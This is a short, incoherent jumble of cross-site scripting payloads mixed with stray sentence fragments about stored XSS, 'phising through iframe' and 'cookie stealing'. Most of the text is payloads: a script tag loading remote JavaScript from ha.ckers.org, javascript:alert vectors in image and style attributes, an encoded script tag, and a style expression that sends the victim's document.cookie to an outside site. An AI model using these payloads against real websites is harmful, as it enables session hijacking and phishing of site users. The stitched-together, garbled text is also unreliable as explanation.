`"'> Actions: phising through iframe, cookie stealing, always try convert self to reflected. <SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> , <;IMG SRC=";javascript:alert(';XSS';)"; <A HREF="//www.google.com/">XSS</A> & test [endif]--> The information in this article is not new. XXX test <DIV STYLE="background-image: url(javascript:alert('XSS'))"> But it is also possible for the server to store the attacker-supplied input (the XSS payload) and serve it to the victim at a later time. javascript:alert(1); "`'> test "`'> %BCscript%BEalert(%A2XSS%A2)%BC/script%BE <~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)>